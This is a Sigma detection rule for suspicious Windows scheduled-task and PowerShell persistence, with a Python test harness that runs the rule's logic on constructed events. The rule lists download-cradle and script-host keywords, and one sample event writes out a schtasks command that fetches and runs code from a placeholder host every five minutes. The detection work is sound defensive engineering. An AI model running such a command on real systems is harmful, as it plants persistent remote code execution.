```yaml
title: Suspicious Persistence via Scheduled Tasks or PowerShell
id: edr-win-persist-schtask-abuse
status: stable
description: >
    Detects persistence attempts via scheduled tasks or PowerShell from unverified
    or suspicious parent processes. Catches schtasks /create with short intervals
    invoking scripting engines or download cradles, PowerShell New-ScheduledTaskAction
    with suspicious payloads, and XML-based task creation from temp/public paths.
references:
    - https://attack.mitre.org/techniques/T1053/005/
author: ShroudCloud
date: 2026/04/16
tags:
    - attack.persistence
    - attack.t1053.005
logsource:
    category: process_creation
    product: windows
detection:
    # Signed parents are dropped via 'not parent_signed' in the condition
    # (Sigma has no 'notin' modifier; negation belongs in the condition).
    parent_signed:
        ParentCodeSignature:
            - 'valid'
            - 'verified'
    # List of maps: the parent matches on EITHER its image path OR its original
    # file name, so a renamed script host or LOLBin is still caught.
    parent_filter:
        - ParentImage|endswith:
            - '\cmd.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\rundll32.exe'
            - '\regsvr32.exe'
            - '\wmic.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\powershell_ise.exe'
            - '\wmiprvse.exe'
            - '\wsmprovhost.exe'
            - '\winrshost.exe'
        - ParentOriginalFileName|endswith:
            - 'Command Prompt'
            - 'Microsoft ® Windows Based Script Host'
            - 'Microsoft ® Console Based Script Host'
            - 'Windows host process (Rundll32)'
            - 'Microsoft(C) Register Server'
            - 'WMI Commandline Utility'
            - 'Microsoft (R) HTML Application host'
            - 'Windows PowerShell'
            - 'PowerShell'
            - 'Windows PowerShell ISE'
            - 'WMI Provider Host'
            - 'Host process for WinRM plug-ins'
            - "Host Process for WinRM's Remote Shell plugin"
    parent_exclusion:
        ParentImage|endswith:
            - '\gpscript.exe'
            - '\msiexec.exe'
    # schtasks /create (or -create): a plain list is OR; 'contains|all' would
    # have required both spellings in the same command line.
    persistence_schtasks:
        Image|endswith: '\schtasks.exe'
        CommandLine|contains:
            - '/create'
            - '-create'
    cmdline_interval:
        CommandLine|contains:
            - 'once'
            - 'minute'
            - 'hourly'
            - 'daily'
            - 'onlogon'
            - 'onstart'
    cmdline_payload:
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'downloadstring'
            - 'get-itemproperty'
            - 'cmd.exe /c'
            - 'powershell'
            - 'pwsh.exe'
            - 'mshta'
            - 'wscript'
            - 'cscript'
            - 'rundll32'
            - 'ssh'
            - 'python'
            - '$env:'
    # Task definition imported from a temp or world-writable path
    persistence_schtasks_xml:
        Image|endswith: '\schtasks.exe'
        CommandLine|contains:
            - '/xml'
            - '-xml'
    schtasks_xml_path:
        CommandLine|contains:
            - 'c:\windows\temp\'
            - 'c:\temp\'
            - '\perflogs\'
            - '\users\public\'
    # New-ScheduledTaskAction combined with a scripting engine or download cradle
    persistence_powershell:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains: 'New-ScheduledTaskAction'
    powershell_payload:
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'downloadstring'
            - 'cmd.exe /c'
            - 'powershell'
            - 'pwsh.exe'
            - 'mshta'
            - 'wscript'
            - 'cscript'
            - 'rundll32'
            - 'ssh'
            - 'python'
            - '$env:'
    condition: >
        parent_filter and not parent_signed and not parent_exclusion and
        (
            (persistence_schtasks and cmdline_interval and cmdline_payload)
            or (persistence_schtasks_xml and schtasks_xml_path)
            or (persistence_powershell and powershell_payload)
        )
falsepositives:
    - Legitimate scheduled tasks created by IT admin scripts (baseline by parent and workflow)
level: high
```
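To check the rule's logic against events before shipping it, here is an added Python example (not part of the rule or its author's code) that implements the condition above as a predicate and runs it over constructed process_creation events; only the ParentImage branch of the parent filter is implemented, and the sample paths, task names and URL are made up.

```python
# Added example, not the rule author's code: the rule's condition as a Python
# predicate; only the ParentImage branch of parent_filter is implemented.
PARENT_IMAGES = ('\\cmd.exe', '\\wscript.exe', '\\cscript.exe', '\\rundll32.exe',
                 '\\regsvr32.exe', '\\wmic.exe', '\\mshta.exe', '\\powershell.exe',
                 '\\pwsh.exe', '\\powershell_ise.exe', '\\wmiprvse.exe',
                 '\\wsmprovhost.exe', '\\winrshost.exe')
PARENT_EXCLUDED = ('\\gpscript.exe', '\\msiexec.exe')
INTERVALS = ('once', 'minute', 'hourly', 'daily', 'onlogon', 'onstart')
PAYLOADS = ('curl', 'wget', 'downloadstring', 'get-itemproperty', 'cmd.exe /c',
            'powershell', 'pwsh.exe', 'mshta', 'wscript', 'cscript', 'rundll32',
            'ssh', 'python', '$env:')
SUSPICIOUS_PATHS = ('c:\\windows\\temp\\', 'c:\\temp\\', '\\perflogs\\', '\\users\\public\\')

def _any(value, needles, fn=str.__contains__):
    v = value.lower()  # Sigma string matching is case-insensitive
    return any(fn(v, n.lower()) for n in needles)

def matches(event):
    parent, image, cmd = (event.get(k, '') for k in ('ParentImage', 'Image', 'CommandLine'))
    if (event.get('ParentCodeSignature', '').lower() in ('valid', 'verified')
            or not _any(parent, PARENT_IMAGES, str.endswith)
            or _any(parent, PARENT_EXCLUDED, str.endswith)):
        return False  # parent_filter and not parent_signed and not parent_exclusion
    is_schtasks = _any(image, ('\\schtasks.exe',), str.endswith)
    # schtasks /create with a short interval AND a scripting/download payload
    sel_create = (is_schtasks and _any(cmd, ('/create', '-create'))
                  and _any(cmd, INTERVALS) and _any(cmd, PAYLOADS))
    # task definition loaded from a temp or world-writable path
    sel_xml = is_schtasks and _any(cmd, ('/xml', '-xml')) and _any(cmd, SUSPICIOUS_PATHS)
    # New-ScheduledTaskAction wrapping a suspicious payload
    sel_ps = (_any(image, ('\\powershell.exe', '\\pwsh.exe'), str.endswith)
              and 'new-scheduledtaskaction' in cmd.lower() and _any(cmd, PAYLOADS))
    return sel_create or sel_xml or sel_ps

def ev(parent, sig, image, cmd):  # build one process_creation event
    return {'ParentImage': parent, 'ParentCodeSignature': sig, 'Image': image, 'CommandLine': cmd}

SYS = 'C:\\Windows\\System32\\'
EVENTS = [  # constructed sample events, not real telemetry
    ev(SYS + 'cmd.exe', 'unsigned', SYS + 'schtasks.exe', 'schtasks /create /sc minute /mo 5 '
       '/tn Updater /tr "powershell -c (New-Object Net.WebClient).DownloadString(\'http://example.invalid/x\')"'),
    ev('C:\\Windows\\explorer.exe', 'unsigned', SYS + 'schtasks.exe',
       'schtasks /create /sc daily /tn Backup /tr C:\\Tools\\backup.exe'),  # parent not in list
    ev(SYS + 'cmd.exe', 'valid', SYS + 'schtasks.exe', 'schtasks /create /sc onlogon /tn Sync /tr "powershell -File sync.ps1"'),
    ev(SYS + 'cmd.exe', 'unsigned', SYS + 'schtasks.exe', 'schtasks /create /xml C:\\Users\\Public\\task.xml /tn Svc'),
    ev(SYS + 'wscript.exe', 'unsigned', SYS + 'WindowsPowerShell\\v1.0\\powershell.exe',
       'powershell -c "$a = New-ScheduledTaskAction -Execute mshta.exe"'),
]
```

The second event fails the parent filter and the third has a signed parent, so only the first, fourth and fifth fire; the fourth is caught by the XML branch alone, since it carries no interval or payload keyword.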